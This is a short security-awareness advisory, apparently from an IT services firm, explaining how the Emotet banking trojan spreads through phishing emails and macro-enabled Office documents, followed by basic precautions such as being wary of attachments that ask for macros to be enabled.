What is Emotet?
Emotet is malware classified as a banking trojan. It is under continual development by malicious actors with skills on-par with professional software engineers. Its modular design allows its developers to update and change code as needed to support new features. Trend Micro researchers also reported there are two sets of infrastructure in the Americas supporting the distribution of malicious documents and binaries with new iterations on a daily basis.
The current initial infection vector of Emotet is most commonly a malicious Microsoft Office document. Past iterations have also used executable binaries disguised to appear similar to PDF documents. The deployment method of initial infection material is most commonly through email. Prospective victims receive phishing email messages resembling online order and shipping confirmations, invoices, or other receipts. After clicking a malicious link in the email or opening an email attachment, Microsoft Office will open the document. The user is prompted to enable macros. After macros are enabled, the older document versions will spawn a combination of ‘cmd.exe’ and PowerShell processes to download further stages of Emotet. This is a particularly nasty piece of malware that when fully deployed within enterprise networks, and enables the download and execution of additional malware.
These types of malware are created to spread – spread across your network and even to business partners.
An example of an Emotet payload email displayed below. The FBI issued a new warning about this today and we have received information that there is an active incident in the Lexington area.
Remember the Basics
- Be cautious of clicking links or opening attachments. If you didn’t expect to receive, verify by calling the sender.
- Always be suspicious of attachments requesting macros be enabled.
- Don’t depend on your spam filter, like Mimecast, to stop this phishing.
- Anti-Virus protection is mostly ineffective due to the rapidly changing nature of the malware.
- Train everyone with contact to your network – if you are not already, please give us a call.